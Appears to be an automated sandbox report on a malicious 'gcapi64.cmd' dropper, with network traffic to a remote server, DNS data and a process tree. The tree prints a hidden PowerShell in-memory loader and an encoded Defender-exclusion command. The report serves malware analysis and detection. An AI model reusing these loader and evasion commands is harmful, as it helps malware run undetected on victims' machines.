                                                                Aug 22, 2024 11:45:52.985930920 CEST5493739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:53.086105108 CEST5493839001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:53.090929031 CEST390015493891.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:53.091012001 CEST5493839001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:53.106070995 CEST5493839001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:53.111362934 CEST390015493891.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:53.111416101 CEST5493839001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:53.117012978 CEST390015493891.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:58.310740948 CEST390015493891.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:58.366044998 CEST5493839001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:58.443228960 CEST390015493891.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:58.444335938 CEST5493839001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:58.450341940 CEST390015493891.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:58.450433969 CEST5493839001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:58.554943085 CEST5494039001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:58.561850071 CEST390015494091.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:58.561966896 CEST5494039001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:58.582365036 CEST5494039001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:58.587233067 CEST390015494091.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:58.587306023 CEST5494039001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:58.592237949 CEST390015494091.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:05.466881037 CEST390015494091.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:05.506674051 CEST5494039001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:05.597048998 CEST390015494091.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:05.597945929 CEST5494039001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:05.603426933 CEST390015494091.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:05.603523970 CEST5494039001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:05.710814953 CEST5494139001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:05.715682030 CEST390015494191.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:05.715763092 CEST5494139001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:05.730509043 CEST5494139001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:05.735316992 CEST390015494191.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:05.735374928 CEST5494139001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:05.740241051 CEST390015494191.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:12.172439098 CEST390015494191.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:12.225433111 CEST5494139001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:12.302764893 CEST390015494191.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:12.303770065 CEST5494139001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:12.309542894 CEST390015494191.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:12.309614897 CEST5494139001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:12.414154053 CEST5494239001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:12.419116974 CEST390015494291.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:12.421329975 CEST5494239001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:12.436043978 CEST5494239001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:12.440849066 CEST390015494291.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:12.442291975 CEST5494239001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:12.447058916 CEST390015494291.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:17.853841066 CEST390015494291.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:17.975764036 CEST5494239001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:17.990720034 CEST390015494291.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:17.992163897 CEST5494239001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:17.997368097 CEST390015494291.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:17.997473955 CEST5494239001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:18.101661921 CEST5494339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:18.106563091 CEST390015494391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:18.106666088 CEST5494339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:18.125576019 CEST5494339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:18.130373955 CEST390015494391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:18.130491018 CEST5494339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:18.135304928 CEST390015494391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:22.104597092 CEST390015494391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:22.188992023 CEST5494339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:22.240884066 CEST390015494391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:22.241727114 CEST5494339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:22.247014046 CEST390015494391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:22.247055054 CEST5494339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:22.352715015 CEST5494439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:22.357733965 CEST390015494491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:22.357825041 CEST5494439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:22.376166105 CEST5494439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:22.381015062 CEST390015494491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:22.381079912 CEST5494439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:22.386131048 CEST390015494491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:26.397335052 CEST390015494491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:26.459850073 CEST5494439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:26.536525965 CEST390015494491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:26.540079117 CEST5494439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:26.546814919 CEST390015494491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:26.546869993 CEST5494439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:26.649065018 CEST5494539001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:26.654268026 CEST390015494591.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:26.654431105 CEST5494539001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:26.670886993 CEST5494539001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:26.675745010 CEST390015494591.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:26.675822973 CEST5494539001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:26.681488037 CEST390015494591.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:31.126034975 CEST390015494591.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:31.178673029 CEST5494539001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:31.268709898 CEST390015494591.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:31.270176888 CEST5494539001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:31.275654078 CEST390015494591.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:31.275723934 CEST5494539001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:31.382847071 CEST5494639001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:31.387902975 CEST390015494691.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:31.388003111 CEST5494639001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:31.401920080 CEST5494639001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:31.406820059 CEST390015494691.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:31.406912088 CEST5494639001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:31.411801100 CEST390015494691.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:36.577847958 CEST390015494691.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:36.631890059 CEST5494639001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:36.717927933 CEST390015494691.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:36.718826056 CEST5494639001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:36.724785089 CEST390015494691.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:36.724857092 CEST5494639001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:36.836312056 CEST5494739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:36.842998981 CEST390015494791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:36.843116999 CEST5494739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:36.856386900 CEST5494739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:36.862462997 CEST390015494791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:36.862665892 CEST5494739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:36.867425919 CEST390015494791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:41.285669088 CEST390015494791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:41.286516905 CEST390015494791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:41.286688089 CEST5494739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:41.287475109 CEST5494739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:41.295315027 CEST390015494791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:41.295404911 CEST5494739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:41.398550034 CEST5494839001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:41.403580904 CEST390015494891.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:41.403744936 CEST5494839001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:41.429645061 CEST5494839001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:41.434919119 CEST390015494891.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:41.435035944 CEST5494839001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:41.439857006 CEST390015494891.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:47.197459936 CEST390015494891.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:47.241169930 CEST5494839001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:47.333353996 CEST390015494891.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:47.334208965 CEST5494839001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:47.339508057 CEST390015494891.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:47.339572906 CEST5494839001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:47.445321083 CEST5494939001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:47.450485945 CEST390015494991.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:47.450611115 CEST5494939001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:47.463795900 CEST5494939001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:47.468811035 CEST390015494991.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:47.469398975 CEST5494939001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:47.474323034 CEST390015494991.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:53.179409027 CEST390015494991.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:53.225543022 CEST5494939001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:53.322206974 CEST390015494991.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:53.322958946 CEST5494939001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:53.330229998 CEST390015494991.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:53.330302954 CEST5494939001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:53.445419073 CEST5495039001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:53.456583977 CEST390015495091.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:53.456861019 CEST5495039001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:53.471327066 CEST5495039001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:53.476820946 CEST390015495091.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:53.483330965 CEST5495039001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:53.489157915 CEST390015495091.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:57.277745962 CEST390015495091.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:57.319302082 CEST5495039001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:57.411154985 CEST390015495091.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:57.412137032 CEST5495039001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:57.417639971 CEST390015495091.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:57.417701960 CEST5495039001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:57.523526907 CEST5495139001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:57.528531075 CEST390015495191.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:57.528997898 CEST5495139001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:57.803389072 CEST5495139001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:57.808351040 CEST390015495191.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:57.815332890 CEST5495139001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:57.820519924 CEST390015495191.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:57.839339972 CEST5495139001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:57.848114014 CEST390015495191.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:46:57.855325937 CEST5495139001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:46:57.862932920 CEST390015495191.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:00.129149914 CEST390015495191.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:00.178632021 CEST5495139001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:00.269223928 CEST390015495191.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:00.270217896 CEST5495139001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:00.275501966 CEST390015495191.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:00.275604010 CEST5495139001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:00.382810116 CEST5495239001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:00.387762070 CEST390015495291.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:00.387876987 CEST5495239001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:00.399302959 CEST5495239001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:00.404278994 CEST390015495291.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:00.404472113 CEST5495239001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:00.409331083 CEST390015495291.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:02.704538107 CEST390015495291.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:02.705135107 CEST390015495291.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:02.705188036 CEST5495239001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:02.705250978 CEST390015495291.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:02.705291986 CEST5495239001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:02.706170082 CEST5495239001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:02.711440086 CEST390015495291.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:02.711483955 CEST5495239001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:02.820813894 CEST5495339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:02.825874090 CEST390015495391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:02.825968027 CEST5495339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:02.860012054 CEST5495339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:02.864989042 CEST390015495391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:02.865056038 CEST5495339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:02.870001078 CEST390015495391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:03.976464033 CEST390015495391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:04.025384903 CEST5495339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:04.109215021 CEST390015495391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:04.110340118 CEST5495339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:04.115717888 CEST390015495391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:04.117424011 CEST5495339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:04.229535103 CEST5495439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:04.238224030 CEST390015495491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:04.238454103 CEST5495439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:04.253346920 CEST5495439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:04.258208990 CEST390015495491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:04.258320093 CEST5495439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:04.263161898 CEST390015495491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:05.867445946 CEST390015495491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:05.913420916 CEST5495439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:06.016002893 CEST390015495491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:06.069283962 CEST5495439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:10.252294064 CEST5495439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:47:10.262514114 CEST390015495491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:47:10.262568951 CEST5495439001192.168.2.491.92.240.9

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Aug 22, 2024 11:45:18.500456095 CEST5019453192.168.2.41.1.1.1
                                                                Aug 22, 2024 11:45:18.539740086 CEST53501941.1.1.1192.168.2.4
                                                                Aug 22, 2024 11:45:20.607626915 CEST53565401.1.1.1192.168.2.4

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Aug 22, 2024 11:45:18.500456095 CEST192.168.2.41.1.1.10x6c59Standard query (0)relay-01-static.comA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Aug 22, 2024 11:45:18.539740086 CEST1.1.1.1192.168.2.40x6c59No error (0)relay-01-static.com91.92.240.9A (IP address)IN (0x0001)false

                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:05:44:57
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\gcapi64.cmd" "
                                                                Imagebase:0x7ff680870000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:1
                                                                Start time:05:44:57
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:05:44:57
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo F "
                                                                Imagebase:0x7ff680870000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:3
                                                                Start time:05:44:57
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\System32\xcopy.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\gcapi64.cmd.Kwj
                                                                Imagebase:0x7ff622d80000
                                                                File size:50'688 bytes
                                                                MD5 hash:39FBFD3AF58238C6F9D4D408C9251FF5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:05:44:57
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\System32\attrib.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:attrib +s +h C:\Users\user\Desktop\gcapi64.cmd.Kwj
                                                                Imagebase:0x7ff6eb600000
                                                                File size:23'040 bytes
                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:05:44:57
                                                                Start date:22/08/2024
                                                                Path:C:\Users\user\Desktop\gcapi64.cmd.Kwj
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null"
                                                                Imagebase:0x7ff67b750000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2079460129.000002583DC00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.1852130887.00000258253A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000005.00000002.1852130887.00000258253A8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000005.00000002.1996056904.0000025836652000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                • Detection: 0%, Virustotal, Browse
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:05:45:10
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQA
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:7
                                                                Start time:05:45:10
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:8
                                                                Start time:05:45:13
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                Imagebase:0x7ff693ab0000
                                                                File size:496'640 bytes
                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                Has elevated privileges:true
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:10
                                                                Start time:05:45:15
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                Imagebase:0x16b86fa0000
                                                                File size:41'552 bytes
                                                                MD5 hash:909A1D386235DD5F6BA61B91BA34119D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.2929418209.0000016B88F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.2944055026.0000016B990BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
